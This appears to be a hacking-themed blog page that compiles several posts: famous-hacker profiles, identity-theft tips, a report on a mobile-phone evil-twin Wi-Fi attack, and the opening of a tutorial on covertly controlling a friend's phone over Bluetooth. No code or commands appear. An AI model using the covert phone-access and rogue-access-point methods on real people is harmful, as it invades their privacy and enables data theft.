Speaking on the issue, Supreme Court advocate and cyber law expert Pavan Duggal said the hacking of CBI website is an act of cyber war. "I think this is not a mere hacking incident. It is a step towards a cyber war," he said.
Hii! This is Pc Hackers Guru Know Many about Hacking
Top 10 Most Famous Hackers of All Time
The portrayal of hackers in the media has ranged from the high-tech super-spy, as in Mission Impossible where Ethan Hunt repels from the ceiling to hack the CIA computer system and steal the "NOC list," to the lonely anti-social teen who is simply looking for entertainment.
The reality, however, is that hackers are a very diverse bunch, a group simultaneously blamed with causing billions of dollars in damages as well as credited with the development of the World Wide Web and the founding of major tech companies. In this article, we test the theory that truth is better than fiction by introducing you to ten of the most famous hackers, both nefarious and heroic, to let you decide for yourself. Black Hat Crackers
The Internet abounds with hackers, known as crackers or "black hats," who work to exploit computer systems. They are the ones you've seen on the news being hauled away for cybercrimes. Some of them do it for fun and curiosity, while others are looking for personal gain. In this section we profile five of the most famous and interesting "black hat" hackers.
Jonathan James: James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. In an anonymous PBS interview, he professes, "I was just looking around, playing around. What was fun for me was a challenge to see what I could pull off."
James's major intrusions targeted high-profile organizations. He installed a backdoor into a Defense Threat Reduction Agency server. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive emails and capture employee usernames and passwords.
James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, "The software supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost. James explained that he downloaded the code to supplement his studies on C programming, but contended, "The code itself was crappy . . . certainly not worth $1.7 million like they claimed."
Given the extent of his intrusions, if James, also known as "c0mrade," had been an adult he likely would have served at least 10 years. Instead, he was banned from recreational computer use and was slated to serve a six-month sentence under house arrest with probation. However, he served six months in prison for violation of parole. Today, James asserts that he's learned his lesson and might start a computer security company.
Adrian Lamo: Lamo's claim to fame is his break-ins at major organizations like The New York Times and Microsoft. Dubbed the "homeless hacker," he used Internet connections at Kinko's, coffee shops and libraries to do his intrusions. In a profile article, "He Hacks by Day, Squats by Night," Lamo reflects, "I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional."
Lamo's intrusions consisted mainly of penetration testing, in which he found flaws in security, exploited them and then informed companies of their shortcomings. His hits include Yahoo!, Bank of America, Citigroup and Cingular. When white hat hackers are hired by companies to do penetration testing, it's legal. What Lamo did is not.
When he broke into The New York Times' intranet, things got serious. He added himself to a list of experts and viewed personal information on contributors, including Social Security numbers. Lamo also hacked into The Times' LexisNexis account to research high-profile subject matter.
For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.
Kevin Mitnick: A self-proclaimed "hacker poster boy," Mitnick went through a highly publicized pursuit by authorities. His mischief was hyped by the media but his actual offenses may be less notable than his notoriety suggests. The Department of Justice describes him as "the most wanted computer criminal in United States history." His exploits were detailed in two movies: Freedom Downtime and Takedown.
Mitnick had a bit of hacking experience before committing the offenses that made him famous. He started out exploiting the Los Angeles bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation's computer network and stealing software.
Mitnick's mischief got serious when he went on a two and a half year "coast-to-coast hacking spree." The CNN article, "Legendary computer hacker released from prison," explains that "he hacked into computers, stole corporate secrets, scrambled phone networks and broke into the national defense warning system." He then hacked into computer expert and fellow hacker Tsutomu Shimomura's home computer, which led to his undoing.
Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.
Kevin Poulsen: Also known as Dark Dante, Poulsen gained recognition for his hack of LA radio's KIIS-FM phone lines, which earned him a brand new Porsche, among other items. Law enforcement dubbed him "the Hannibal Lecter of computer crime."
Authorities began to pursue Poulsen after he hacked into a federal investigation database. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.
His hacking specialty, however, revolved around telephones. Poulsen's most famous hack, KIIS-FM, was accomplished by taking over all of the station's phone lines. In a related feat, Poulsen also "reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency." Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.
Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying 744 sex offenders with MySpace profiles.
Robert Tappan Morris: Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years' probation, 400 hours of community service and a fined $10,500. Morris is currently working as a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as Roofnet.
White Hat Hackers
Hackers that use their skills for good are classified as "white hat." These white hats often work as certified "Ethical Hackers," hired by companies to test the integrity of their systems. Others, operate without company permission by bending but not breaking laws and in the process have created some really cool stuff. In this section we profile five white hat hackers and the technologies they have developed.
Stephen Wozniak: "Woz" is famous for being the "other Steve" of Apple. Wozniak, along with current Apple CEO Steve Jobs, co-founded Apple Computer. He has been awarded with the National Medal of Technology as well as honorary doctorates from Kettering University and Nova Southeastern University. Additionally, Woz was inducted into the National Inventors Hall of Fame in September 2000.
Woz got his start in hacking making blue boxes, devices that bypass telephone-switching mechanisms to make free long-distance calls. After reading an article about phone phreaking in Esquire, Wozniak called up his buddy Jobs. The pair did research on frequencies, then built and sold blue boxes to their classmates in college. Wozniak even used a blue box to call the Pope while pretending to be Henry Kissinger. Wozniak dropped out of college and came up with the computer that eventually made him famous. Jobs had the bright idea to sell the computer as a fully assembled PC board. The Steves sold Wozniak's cherished scientific calculator and Jobs' VW van for capital and got to work assembling prototypes in Jobs' garage. Wozniak designed the hardware and most of the software. In the Letters section of Woz.org, he recalls doing "what Ed Roberts and Bill Gates and Paul Allen did and tons more, with no help." Wozniak and Jobs sold the first 100 of the Apple I to a local dealer for $666.66 each.
Woz no longer works full time for Apple, focusing primarily on philanthropy instead. Most notable is his function as fairy godfather to the Los Gatos, Calif. School District. "Wozniak 'adopted' the Los Gatos School District, providing students and teachers with hands-on teaching and donations of state-of-the-art technology equipment."
Tim Berners-Lee: Berners-Lee is famed as the inventor of the World Wide Web, the system that we use to access sites, documents and files on the Internet. He has received numerous recognitions, most notably the Millennium Technology Prize.
While a student at Oxford University, Berners-Lee was caught hacking access with a friend and subsequently banned from University computers. w3.org reports, "Whilst [at Oxford], he built his first computer with a soldering iron, TTL gates, an M6800 processor and an old television." Technological innovation seems to have run in his genes, as Berners-Lee's parents were mathematicians who worked on the Manchester Mark1, one of the earliest electronic computers.
While working with CERN, a European nuclear research organization, Berners-Lee created a hypertext prototype system that helped researchers share and update information easily. He later realized that hypertext could be joined with the Internet. Berners-Lee recounts how he put them together: "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and – ta-da! – the World Wide Web."
Since his creation of the World Wide Web, Berners-Lee founded the World Wide Web Consortium at MIT. The W3C describes itself as "an international consortium where Member organizations, a full-time staff and the public work together to develop Web standards." Berners-Lee's World Wide Web idea, as well as standards from the W3C, is distributed freely with no patent or royalties due.
Linus Torvalds: Torvalds fathered Linux, the very popular Unix-based operating system. He calls himself "an engineer," and has said that his aspirations are simple, "I just want to have fun making the best damn operating system I can."
Torvalds got his start in computers with a Commodore VIC-20, an 8-bit home computer. He then moved on to a Sinclair QL. Wikipedia reports that he modified the Sinclair "extensively, especially its operating system." Specifically, Torvalds hacks included "an assembler and a text editor…as well as a few games."
Torvalds created the Linux kernel in 1991, using the Minix operating system as inspiration. He started with a task switcher in Intel 80386 assembly and a terminal driver. After that, he put out a call for others to contribute code, which they did. Currently, only about 2 percent of the current Linux kernel is written by Torvalds himself. The success of this public invitation to contribute code for Linux is touted as one of the most prominent examples of free/open source software.
Currently, Torvalds serves as the Linux ringleader, coordinating the code that volunteer programmers contribute to the kernel. He has had an asteroid named after him and received honorary doctorates from Stockholm University and University of Helsinki. He was also featured in Time Magazine's "60 Years of Heroes."
Richard Stallman: Stallman's fame derives from the GNU Project, which he founded to develop a free operating system. For this, he's known as the father of free software. His "Serious Bio" asserts, "Non-free software keeps users divided and helpless, forbidden to share it and unable to change it. A free operating system is essential for people to be able to use computers in freedom." Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.
Stallman's crusade for free software started with a printer. At the MIT lab, he and other hackers were allowed to modify code on printers so that they sent convenient alert messages. However, a new printer came along – one that they were not allowed to modify. It was located away from the lab and the absence of the alerts presented an inconvenience. It was at this point that he was "convinced…of the ethical need to require free software."
With this inspiration, he began work on GNU. Stallman wrote an essay, "The GNU Project," in which he recalls choosing to work on an operating system because it's a foundation, "the crucial software to use a computer." At this time, the GNU/Linux version of the operating system uses the Linux kernel started by Torvalds. GNU is distributed under "copyleft," a method that employs copyright law to allow users to use, modify, copy and distribute the software.
Stallman's life continues to revolve around the promotion of free software. He works against movements like Digital Rights Management (or as he prefers, Digital Restrictions Management) through organizations like Free Software Foundation and League for Programming Freedom. He has received extensive recognition for his work, including awards, fellowships and four honorary doctorates.
Tsutomu Shimomura: Shimomura reached fame in an unfortunate manner: he was hacked by Kevin Mitnick. Following this personal attack, he made it his cause to help the FBI capture him.
Shimomura's work to catch Mitnick is commendable, but he is not without his own dark side. Author Bruce Sterling recalls: "He pulls out this AT&T cellphone, pulls it out of the shrinkwrap, finger-hacks it, and starts monitoring phone calls going up and down Capitol Hill while an FBI agent is standing at his shoulder, listening to him."
Shimomura out-hacked Mitnick to bring him down. Shortly after finding out about the intrusion, he rallied a team and got to work finding Mitnick. Using Mitnick's cell phone, they tracked him near Raleigh-Durham International Airport. The article, "SDSC Computer Experts Help FBI Capture Computer Terrorist" recounts how Shimomura pinpointed Mitnick's location. Armed with a technician from the phone company, Shimomura "used a cellular frequency direction-finding antenna hooked up to a laptop to narrow the search to an apartment complex." Mitnick was arrested shortly thereafter. Following the pursuit, Shimomura wrote a book about the incident with journalist John Markoff, which was later turned into a movie.
We hope you have enjoyed our introduction to some of the most famous real-life hackers, both white and black alike, and have gotten a clearer impression of who hackers really are. To find out more about hacking, cracking, these or other famous hackers, or just how to keep your computer safe from all of the above, check out the following resources:
Hii! This is Pc Hackers Guru Know Many about Hacking
By the time you finish reading this news release, another 100 American identities will be stolen. ID theft tops the list of consumer complaints at the Federal Trade Commission (FTC). It has become so prevalent that consumers are increasingly subscribing to ID theft protection services.
"The cost of having your identity stolen is not only measured in dollars," notes LoudSiren.com V.P. Paul Vazquez. "An ID theft incident can take hundreds of hours of work to correct and years to fully recover from. Having some form of ID theft protection gives consumers peace of mind."
LoudSiren.com, a member of the Identity Protection Network™, also recommends consumers follow these Ten Tips to be better protected (source FTC).
1. Shred documents with personal information before you discard them.
2. Don't carry your Social Security card in your wallet or give out your number unless absolutely necessary.
3. Don't give out personal information over the phone, through the mail or on the Internet unless you know and trust who you are dealing with.
4. Keep your personal information in a secure place at home.
5. Inspect your credit report regularly.
6. Monitor your monthly statements for charges you didn't make.
7. Check with the company if you get a surprise bill or if you were denied credit for no apparent reason.
8. If you suspect identity theft, place a "fraud alert" on your credit reports.
9. Close any accounts that have been tampered with or established fraudulently.
10. If your identity is stolen, file a police report because creditors may want proof of the crime.
LoudSiren.com's Identity Protection Network™ is the only identity protection service that:
1. Protects consumers' privacy by keeping their personal phone numbers private.
2. Speeds the process of clearing fraud alerts with a patent-pending identity authentication technology.
3. Keeps a record of credit requests sent to consumers and consumer responses.
4. Allows consumers with the push of a button to immediately report to law enforcement fraudulent attempts to open new credit accounts.
Hii! This is Pc Hackers Guru Know Many about Hacking
In order to steal your data trough a rogue access point attack, a hacker needs only to overpower the local Wi-Fi access point and have your laptop associate with his evil network rather than the public one. You will still be connected to the Internet, except all your personal data will pass through the hacker’s computer which acts as a man-in-the-middle.
To run a successful rogue access point attack you need to control DNS and Internet traffic, as well as be able to sniff that traffic, and in the past that required another laptop. But Cnet’s reporter, Robert Vamosi presents a mobile phone scenario outlined by Carl Banzhof, VP and chief technology evangelist for McAfee during the RSA Conference 2007 in San Francisco.
Mobile phones vs laptops
The market for smart phones, some with the memory and capacity of a small laptop, continues to grow everyday.
Banzhof cites that many mobile devices today currently or will soon support Bluetooth, infrared, GPRS/EDGE, and Wi-Fi 802.11 technology. The market is evenly split in operating systems between Blackberry OS, Palm OS, and Windows Mobile, with the latter capable of running Internet Information Server (IIS). It's the Windows Mobile OS that interested Banzhof most.
The advantages of using a mobile device in an evil twin attack instead of a bulky laptop are many: mobile devices are easily camouflaged, portable, and can allow close proximity to the intended victim. Mobile devices are rapidly becoming transparent; everyone has one, so what's the big security concern?
Creating a mobile access point
To carry out this mobile evil twin attack, Banzhof chose the T Mobile MDA for his experiment. It runs Windows Mobile 5.0 as its operating system. It uses a TI OMAP 850 processor, so it has enough oomph, and it includes an 802.11 chipset, TI ACX100. Best of all, it has a robust developer community.
Banzhof faced a number of technical challenges--in part because most of the tools were written for Linux, not Windows Mobile. He looked around for other work done on WinCE and Windows Mobile 5 and found none. He considered converting the device to Linux but decided that violated the spirit of the project. He found some Linux projects that could be ported over, namely Hostapd and Karma. He started to use Visual Studio 2005 to compile the new code by hand, and instead found an open-source tool, CeGCC, to cross compile.
Devil in the details
By using Hostapd, Banzhof had many user-space 802.11 functions at his disposal, such as user authentication, encryption, initializing a network interface, beacon intervals to call out to susceptible laptops, and Extended Authoritization Protocol (EAP) keys. It also gave him an interface into the ACX100 driver (which handles the 802.11 protocol) so he could handle the management, transmission, and reception of wireless data packets. But again, there were problems. The open source app, CeGCC, doesn't always work right so he had to improvise, and wireless card selection for Hostapd was limited and didn't exist for the mobile device form factor.
The IIS for Windows Mobile server posed similar challenges. ISS for Windows Mobile supports Active Server Pages and ISAPI, with configurable options found in the system registry for allowing ports, creating virtual directors, and controlling bandwidth.
Testing it out
Banzhof reported to the RSA conference that he'd successfully ported Hostapd to Windows CE, he had his DHCP/DNA Server operational, and his Web server was online. He hopes in the future to route his sniffed Internet traffic to legitimate access points or via smart phone radio (EDGE) for further analysis.
Banzhof also hinted that similar hacks could be carried out with the new iPhone from Apple, given that many of the tools he used already run on Unix and Linux. Never mind that Apple promises that the iPhone will be a closed system. Banzhof noted that hasn't stopped anyone before.
Hii! This is Pc Hackers Guru Know Many about Hacking
log into your friends mobile
read his messages
change his phone settings- read his messages
change profile
play his ringtone even if phone is on silent
play his songs(in his phone)
restart the phone
switch off the phone
restore factory settings
change ringing volume
call from his phone
Ok so how the hell to do this Ok for starters this is no hack. It uses bluetooth's existing functionality to access the features being talked about.
Prerequisites:
The other phone must be bluetooth enabled(most are these days)
The other phone must have bluetooth on(Surprisingly a lot of people always have it on, in spite of the fact that you should never have it on, it eats you battery. How many people, a BBC panaroma program some time back used this to find out that more than 60% of people have left bluetooth on
Unless the other person configured it that way, you do require permission to pair once. So you need to be paired with the other phone once to use this hack next time without anyone's knowing. (Thats why its hack your friends mobile, your friend might have paired you already